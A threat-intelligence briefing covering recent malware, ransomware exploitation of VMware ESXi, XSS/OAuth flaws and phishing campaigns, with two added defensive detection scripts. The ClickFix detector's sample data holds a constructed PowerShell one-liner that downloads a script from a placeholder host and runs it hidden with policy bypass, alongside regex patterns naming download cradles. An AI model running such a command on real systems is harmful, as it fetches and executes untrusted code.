
Cyware Daily Threat Intelligence


Daily Threat Briefing Jul 30, 2024

A new cyber threat lurks in the form of a PowerShell backdoor discovered by Walmart’s Cyber Intelligence Team, paired with a variant of the Zloader malware. This backdoor uses advanced obfuscation to grant attackers deep system access, enabling further malware deployment.

As new software vulnerabilities emerge, ransomware gangs are quick to pounce on them. Microsoft has issued a warning that ransomware operators, including Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest, are exploiting a vulnerability in VMware ESXi. Tracked as CVE-2024-37085, the flaw lets an attacker who already holds sufficient Active Directory privileges grant an account full administrative access to domain-joined ESXi hypervisors.

Meanwhile, a new phishing scam was found targeting Microsoft OneDrive users, tricking them into running a malicious PowerShell script. Known as OneDrive Pastejacking, the attack begins with an email containing an HTML file simulating a OneDrive page and urging the recipient to update their DNS cache.

Top Malware Reported in the Last 24 Hours

New PowerShell backdoor discovered

Walmart’s Cyber Intelligence Team discovered a new PowerShell backdoor alongside a variant of the Zloader/SilentNight malware. The backdoor uses advanced obfuscation techniques and enables threat actors to gain further access and deploy additional malware. Zloader, originally a banking Trojan, has evolved into multifunctional malware linked to ransomware groups such as Ryuk and DarkSide. The PowerShell backdoor shares similarities with another malware family, PowerDash; both use obfuscation to hide their functionality and to communicate with their command-and-control servers.

Polish businesses hit with malware

Cybercriminals are targeting small and medium-sized businesses in Poland, Italy, and Romania with phishing campaigns that deliver malware such as Agent Tesla, Formbook, and Remcos RAT. ESET researchers reported that the attackers used compromised email accounts and servers to send the malicious emails and host the malware. The campaigns, delivered in nine waves, use the DBatLoader malware loader to drop the final payloads.

UNC4393 switches to custom malware

UNC4393, the group behind Black Basta ransomware deployments, has been shifting tactics since mid-2022. According to the latest research, UNC4393 initially relied on QAKBOT for initial access but adapted after the Qakbot botnet takedown, moving to custom malware and different techniques. The group has transitioned from readily available tools to custom or privately sourced malware including Black Basta, SystemBC, KnotWrap, DawnCry, and PortYard, and has diversified its access methods through DARKGATE and SILENTNIGHT alongside open-source and custom tools for reconnaissance.

Top Vulnerabilities Reported in the Last 24 Hours

Ransomware gangs exploit VMware ESXi bug

Microsoft issued a warning that ransomware gangs are exploiting an authentication bypass vulnerability in VMware ESXi. The flaw, tracked as CVE-2024-37085, stems from domain-joined ESXi hosts granting full administrative access by default to every member of an Active Directory group named "ESX Admins", without verifying that such a group was created deliberately. An attacker with enough domain privileges therefore only needs to create a group with that name (or rename an existing one) and add an account to it to obtain full admin rights on the hypervisor. VMware fixed the bug in ESXi 8.0 U3. The vulnerability has been used by Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest to deploy Akira and Black Basta ransomware.
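The detection a defender most wants for this pattern lives on the Active Directory side, not the hypervisor: the group creation, rename and membership change all land in the Windows Security log before any ESXi host is touched. The hunting logic below is an added example, not code from Cyware, Microsoft or VMware. The event records are constructed to mimic Windows Security log fields (EventID, TargetUserName as the group name, MemberName as the added principal, SubjectUserName as the account making the change); the field names, and the case-insensitive name match, are assumptions to adapt to your SIEM.

```python
"""Hunt Windows Security events for the CVE-2024-37085 abuse pattern:
an AD group named "ESX Admins" is created (or an existing group is renamed
to that name) and an account is added to it, after which domain-joined
ESXi hosts treat that account as a full administrator.

Added example, not code from Cyware, Microsoft or VMware. The sample
events are constructed, not real log data, and the field names are an
assumption about how a SIEM exposes Windows Security events.
"""

from dataclasses import dataclass
from typing import Optional

# Windows Security event IDs for security-enabled group lifecycle events.
GROUP_CREATED = {4727, 4731, 4754}   # global, local, universal group created
GROUP_CHANGED = {4737, 4735, 4755}   # group changed (a rename lands here)
MEMBER_ADDED = {4728, 4732, 4756}    # member added to global/local/universal


def _normalise(name: str) -> str:
    # Case- and whitespace-insensitive match is a conservative hunting
    # choice (an assumption, not a statement about how ESXi compares names).
    return " ".join(name.split()).casefold()


TARGET_GROUP = _normalise("ESX Admins")


@dataclass(frozen=True)
class Finding:
    event_id: int
    kind: str            # "group_created", "group_changed" or "member_added"
    group: str
    actor: str
    member: Optional[str]
    time: str


def hunt_esx_admins(events):
    """Return a Finding for every event that touches an 'ESX Admins' group."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        # For a rename, the new SAM account name is what ESXi will see, so
        # prefer it when the record carries one (assumed field name).
        group = ev.get("SamAccountName") or ev.get("TargetUserName", "")
        if _normalise(group) != TARGET_GROUP:
            continue
        if eid in GROUP_CREATED:
            kind = "group_created"
        elif eid in GROUP_CHANGED:
            kind = "group_changed"
        elif eid in MEMBER_ADDED:
            kind = "member_added"
        else:
            continue
        findings.append(Finding(eid, kind, group, ev.get("SubjectUserName", "?"),
                                ev.get("MemberName"), ev.get("TimeCreated", "")))
    return findings


def actors_of_interest(findings):
    """Accounts that both created/renamed the group and populated it."""
    by_actor = {}
    for f in findings:
        by_actor.setdefault(f.actor, set()).add(f.kind)
    return sorted(actor for actor, kinds in by_actor.items()
                  if kinds & {"group_created", "group_changed"}
                  and "member_added" in kinds)


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4727, "TimeCreated": "2024-07-29T02:14:05Z",
     "SubjectUserName": "svc_backup", "TargetUserName": "ESX Admins"},
    {"EventID": 4728, "TimeCreated": "2024-07-29T02:14:09Z",
     "SubjectUserName": "svc_backup", "TargetUserName": "ESX Admins",
     "MemberName": "CN=jdoe,OU=Users,DC=corp,DC=local"},
    {"EventID": 4727, "TimeCreated": "2024-07-29T09:00:00Z",
     "SubjectUserName": "itadmin", "TargetUserName": "Finance-Readers"},
    {"EventID": 4737, "TimeCreated": "2024-07-29T11:30:00Z",
     "SubjectUserName": "jdoe", "TargetUserName": "Old-Helpdesk",
     "SamAccountName": "esx  admins"},
    {"EventID": 4728, "TimeCreated": "2024-07-29T11:31:00Z",
     "SubjectUserName": "itadmin", "TargetUserName": "Domain Users",
     "MemberName": "CN=newhire,OU=Users,DC=corp,DC=local"},
]

if __name__ == "__main__":
    found = hunt_esx_admins(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("actors to triage:", actors_of_interest(found))
```

On the sample data this flags the group creation and the member add by svc_backup plus the rename by jdoe, and reports svc_backup as the actor who both created and populated the group. Pair it with a host-side check: on each ESXi host, review the advanced settings `Config.HostAgent.plugins.hostsvc.esxAdminsGroup` and `Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd`, which control the group name honoured and whether it is granted admin rights automatically, so that a hunt hit can be matched against what the hypervisor will actually accept.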

XSS threats against Hotjar and Business Insider

Researchers at Salt Labs uncovered critical cross-site scripting (XSS) vulnerabilities in the Hotjar web analytics platform and on Business Insider. Chaining XSS with OAuth, the widely used authorization framework behind most "sign in with" flows, could lead to full account takeover: an attacker who tricks a user into clicking a malicious link can run script in the victim's session and capture the OAuth credentials the page handles. Hotjar is deployed on over a million websites, and its customers include major brands such as Adobe, Microsoft, T-Mobile, and Nintendo, all of which were exposed to the risk of a data breach.

Google fixes authentication weakness

In a recent campaign, cybercriminals bypassed Google's email verification to create thousands of Google Workspace accounts and used them to access third-party services. Google has fixed the authentication weakness that allowed this: bad actors were able to impersonate a domain holder at services that use the "Sign in with Google" feature. Google fixed the issue within 72 hours of identifying it and added detection to prevent such bypasses in the future.

Top Scams Reported in the Last 24 Hours

EchoSpoofing phishing campaign unveiled

Proofpoint's email protection service was abused in a phishing campaign dubbed "EchoSpoofing" to send millions of spoofed emails a day impersonating major companies such as Disney, Nike, IBM, and Coca-Cola, with Fortune 100 companies among the targets. The campaign began in January 2024 and peaked in June at 14 million spoofed emails per day. Guardio Labs discovered the campaign and the weakness in Proofpoint's servers that made it possible: threat actors could route mail sent from Office 365 accounts through Proofpoint's relays, so that it reached recipients with the impersonated brand's authentication intact.

Scammers target OneDrive users

A new phishing scam targeting Microsoft OneDrive users tricks them into running a malicious PowerShell script themselves. Known as OneDrive Pastejacking, the attack begins with an email containing an HTML file that mimics a OneDrive page, reports a connection error, and urges the recipient to update their DNS cache. Clicking "How to fix" copies a PowerShell command to the clipboard and instructs the user to paste it into the Run dialog or a terminal; the command creates a folder, downloads files, and executes a script. The campaign has been observed in several countries, including the U.S. and the U.K. The tactic, also known as ClickFix, is on the rise according to researchers at ReliaQuest, Proofpoint, and McAfee Labs.
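Because the victim launches the command by hand, the telemetry signature of this chain is a shell spawned by explorer.exe (the Run dialog) with a command line that stages a directory, downloads and then executes something. The scorer below is an added example, not code from Cyware or any of the vendors named above. The process-creation records are constructed to resemble Sysmon Event ID 1 / Security 4688 fields; hostnames, users, paths, the URL and the weights are placeholders to tune, not a vendor's rule.

```python
"""Heuristic detection for the OneDrive "pastejacking" / ClickFix chain:
the victim pastes a clipboard-planted PowerShell one-liner into the Run
dialog, so powershell.exe is spawned by explorer.exe with a command line
that creates a folder, downloads a payload and executes it.

Added example, not code from Cyware or the vendors it cites. The sample
events are constructed; the URL, paths and accounts are placeholders.
"""

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer)", re.I)
STAGING_DIR = re.compile(r"(new-item\b.*-itemtype\s+dir|\bmkdir\b|\bmd\b)", re.I)
EXEC_STAGE = re.compile(r"(invoke-expression|\biex\b|start-process|\bsaps\b|-file\s)", re.I)
EVASION = re.compile(
    r"(-(w|window|windowstyle)\s+hidden|-(ep|executionpolicy)\s+(bypass|unrestricted)|"
    r"-(nop|noprofile)\b|-(enc|encodedcommand|e)\s)", re.I)
URL = re.compile(r"https?://", re.I)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_clickfix(ev: ProcEvent):
    """Return (score, reasons). Higher means closer to the paste-and-run chain."""
    score, reasons = 0, []
    cl = ev.command_line
    if _basename(ev.image) in SHELLS and _basename(ev.parent_image) == "explorer.exe":
        score += 2
        reasons.append("shell spawned by explorer.exe (Run dialog / Start menu)")
    if DOWNLOAD_CRADLE.search(cl):
        score += 2
        reasons.append("download cradle on the command line")
    if URL.search(cl):
        score += 1
        reasons.append("URL on the command line")
    if STAGING_DIR.search(cl):
        score += 1
        reasons.append("creates a staging directory")
    if EXEC_STAGE.search(cl):
        score += 1
        reasons.append("executes a downloaded file or expression")
    if EVASION.search(cl):
        score += 1
        reasons.append("hidden window / policy bypass / encoded command")
    return score, reasons


def detect(events, threshold: int = 5):
    """Events whose score reaches the threshold, with the triggering reasons."""
    hits = []
    for ev in events:
        score, reasons = score_clickfix(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Constructed: the paste-into-Run chain (placeholder URL and paths).
    ProcEvent("WS-0412", "CORP\\alice", r"C:\Windows\explorer.exe", PS,
              r'powershell -ExecutionPolicy Bypass -w hidden -c "New-Item -ItemType Directory -Force '
              r'-Path $env:TEMP\od; Invoke-WebRequest -Uri http://update.example.invalid/fix.ps1 '
              r'-OutFile $env:TEMP\od\fix.ps1; Start-Process powershell -ArgumentList -File,$env:TEMP\od\fix.ps1"'),
    # Constructed: a scheduled inventory script run by a service.
    ProcEvent("WS-0412", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\svchost.exe", PS,
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    # Constructed: a user opening an interactive PowerShell from the Start menu.
    ProcEvent("WS-0199", "CORP\\bob", r"C:\Windows\explorer.exe", PS,
              r'powershell.exe -NoExit -Command "Get-ChildItem C:\Users\bob\Documents"'),
]

if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"{ev.host} {ev.user} score={score}: {'; '.join(reasons)}")
```

Only the first sample crosses the threshold (score 8); the service-run script and the interactive shell score 2 each, which is the point of weighting the parent-process and download-cradle indicators above the rest. When triaging a hit, the Run dialog also records what was typed under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which is a quick way to confirm that the command came from a paste rather than from a script or shortcut.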
